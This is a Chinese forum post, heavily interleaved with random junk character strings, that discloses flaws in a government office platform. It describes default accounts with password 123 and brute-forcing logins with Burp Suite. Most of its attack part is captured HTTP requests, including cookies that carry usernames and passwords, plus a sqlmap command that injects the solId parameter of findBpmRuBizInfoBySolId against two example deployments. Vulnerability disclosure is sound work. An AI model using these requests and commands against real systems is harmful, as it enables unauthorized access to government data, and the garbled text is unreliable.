|
* R7 d }, e0 ?. ~
# p1 V O: y- b % j" D( h. p6 v2 t2 v( H
- Y0 q8 ^+ Q; s& D5 ^, f
平台简介:9 R" A, W) [9 w2 y# M
+ O/ S0 b+ o% o1 W1 s0 m* a$ |6 ^* d2 a9 S
- e7 s( h f% O. I
5 X+ ?. N7 ]' a8 }. @0 E
% z- i$ b: a1 ]& C, g6 x 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
9 n: b9 z! e! R# u0 Z0 W' o) j8 ~4 Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ M1 X4 M% g) R( |( }同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
! @+ ]5 a. ], j9 N % w2 e2 D ?! _1 f$ n* C
2 v/ |& I* `" ^ m8 A
: t. `: G \% f ] + V! e& w% I7 N/ _3 ]7 U
6 n, Q; O5 t6 {$ p7 q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
' D: f+ o0 `7 G( c4 U
, @8 G- B# o' k ^/ L9 p. v3 C- ~4 p0 Y0 H
& a* I H1 U5 q8 X8 I- q/ W% |
; X8 `2 |" R/ u0 m
3 R0 N# t' x- s
http://1.1.1.1:7197/cap-aco/#(案例2-)
6 h I& \/ T; W& P 7 A' a9 D; i9 ^4 F8 {# e+ {
. S7 B, K! @: k* X' [& L http://www.XXOO.com (案例1-官网网站)% `4 D: {! `7 k+ @: z7 Z" d3 P1 ]
& N2 |" L6 j) ~: T( D! E- F- Q) g) q2 Z) h0 P+ t* ?
- W6 v$ b, N! P0 ^; ]% B# s
% t+ Z0 r4 b/ H9 [0 j- {+ h$ v8 ^/ @$ z: n% [, S$ t" \
漏洞详情:
" s( B/ B9 C7 d4 V: P2 y# Y2 C : w7 J, N3 R) ?* l) t& Y
1 X% O# N& R& A+ w& S
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
: {& ~9 S- L2 ]8 H8 O5 [1 r
$ w' o8 Q9 T8 v; E, T
/ D9 }$ O4 W( D) N. R; v- S 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:4 X0 h) K5 f' T( A- a. Z
& W8 t: W$ E3 d
1 X* T) ?! u" w* C3 O4 s , s- W/ o( Q* [5 ^9 V2 b/ R
" w4 Q# a: ^5 z" _. M
+ r8 {: ?6 z$ S z  % \+ o' {. I# Z2 E) N# I( @
6 J3 U6 ^! y8 t) f' H ]& P* E% R9 G* o! m5 l
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
6 w7 s1 g ], B' H+ k% D& ?" e5 j
5 K! i9 ~( t3 `) V! W5 T7 s) S+ U- b# j% a$ ?) B* p8 s1 H
1、案例1-官方网站
6 T% f& T' V! ~5 P ?
: r$ R6 u, ?+ ^ m9 J, p4 }4 R6 i, }% f1 @8 l0 e5 I
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
7 r% H V. D# Q/ ~& h( ?) C - t" I, i2 `$ ?# I3 r# I: s2 X& W
1 F$ [/ d- p& R Z1 y, c3 I& } Host: www.XXOO.com
# u/ N, S. `) @$ f2 [- ~; M( L ( j" _8 y; M# p
) c# x: M6 }2 Q) }+ W3 o) H- b
Proxy-Connection: Keep-Alive' M3 S% N& X5 g2 t1 T( N5 v
" ~, x7 U4 m( m: w. d9 f& o; x. M% w; z8 g7 t# f, F) F& @7 k0 z
Accept: application/json, text/javascript, */*; q=0.01& N. x& n4 D2 M6 O/ T
, f2 {& T! `4 O$ j% E
1 \6 S* ^; d1 t. g Accept-Language: zh-CN. ~! h$ F( Z+ T! I: v/ X
$ ]* r& v( x6 D6 o M) M5 K# O" G% t0 t2 P1 n8 Y
Content-Type: application/json
* ?. Q, [ t7 e6 n4 ^( p 2 O4 r/ H8 l+ y: D# l
* Z7 {& a3 D# [
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko8 B, c9 i- X" ~/ x
( h4 R7 Y' b6 t' ]3 u7 y# ?6 g, o6 F" D9 P; h, r
X-Requested-With: XMLHttpRequest
7 }+ Y( ~7 w/ A3 b3 T 9 R% B- w% c' x: @7 }7 c4 C
+ X6 _+ g, h- ~
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0027 A( t, ^" U: q1 T) \" v1 I
0 w/ x: l# t/ i- o5 e
2 [. x/ [9 ?, w: n Accept-Encoding: gzip, deflate, sdch: R7 D1 [9 g/ ]) x; T
" N3 e0 e' J4 G# G, }! D2 a1 s% z% s) O5 T) c
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
, M- ~7 W: f# F% } / ~$ W- {. t: W! @, g
9 y/ l. }4 u& J& D# c5 ^2 W4 R7 i 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: |/ [* |! I/ d9 G+ Z3 Y+ a+ I
6 I8 e0 x6 C9 M% I0 W' t
. s, N; J6 k1 I5 [$ `1 D' l& B  / j* V7 t8 X6 {3 H$ j% l3 {1 I, c z
: M1 c( H2 c9 ?) h( D
- F0 i2 T9 c9 I$ R5 M1 w
 : F/ ?* ]6 l) u2 r+ g8 B& C
2 R& i' F! w# [; E$ O N# F& O8 f
j% _+ {- B6 J; v5 K! H , r0 c* {" {5 ]1 {
9 X# c! `) E/ z$ q) e
# F; C5 N% s ^8 m2 M
; ?, m3 T1 j) P6 M8 s 9 C. {* x6 |3 k7 G
& V; s$ I5 C: L7 T% E, o, }
- d* w R0 L% L5 B # K; U7 [) ~% q) H; t" |
+ I" w' p8 B [. X! q+ g- F
2、案例2-某天河云平台
n% h2 Q1 E1 l# k
8 v# A+ G% \$ Z/ t7 m6 i7 o% u' D& m+ G
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1) u3 y2 h# D- ?+ L
0 W* w( c* ]3 x* C, X5 |4 l% ^ q% s
; _5 m) ^' D/ h2 l; D
Host: 1.1.1.:7197
7 v: ~% \& Z0 t) X1 k! p8 i 6 j# u. `3 _! v' m% ~/ _& V
( H( [! K6 _. k# M% ]# e0 G
Accept: application/json, text/javascript, */*; q=0.013 Q k9 p6 a4 } Y5 A5 L
8 ~) v) N- o% B+ Z( t' Y
' r, }' ?0 i2 t: Z X-Requested-With: XMLHttpRequest
% K( U* T. q/ F 0 j' A9 N8 X/ J
6 w' Y* H8 k' ~4 a. V
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
% E; M' v% n5 P7 _# { & U/ v9 d2 J, R& ^
! A6 J& r: j( X' r- T3 p Content-Type: application/json& @& p+ c9 T6 P
s4 H! p/ m& n, B8 u; H8 Z8 i$ |2 u+ g/ G2 Y, ?
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008/ \7 T/ e5 G# W
, P6 l( u! q+ v( ]- B
$ s/ W/ i8 ]) }6 W7 H Accept-Language: zh-CN,zh;q=0.8
7 o, j. l# Q0 t# I, d0 ^ a7 r+ Y, R 8 T2 y/ J! S' x: _
/ c! M/ ?$ D, L/ V, i U6 S) m& {
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
/ f7 `: ?4 _* } [. [7 r, l7 d
: U+ D! {; D s2 }) [% e3 u% }+ m3 `% [# j
Connection: close
$ O0 G% G! _' Y' \/ {+ u7 R5 ~ 7 E* `" L9 b/ d
7 a9 \; F4 ~$ Z- s2 G* o. y* g
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:7 l* Y% s. r; w' N3 @
" [, l4 R! f* {) m
3 ], E# S! r9 z- s; [3 S  ' @% \: O6 U! M' l; W) t
* ]+ C! D- }" z0 q" ]3 ^: V* {$ l
1 {6 n# ?7 q3 }+ o | 
发表于 2018-10-20 20:15:17
收藏
支持
反对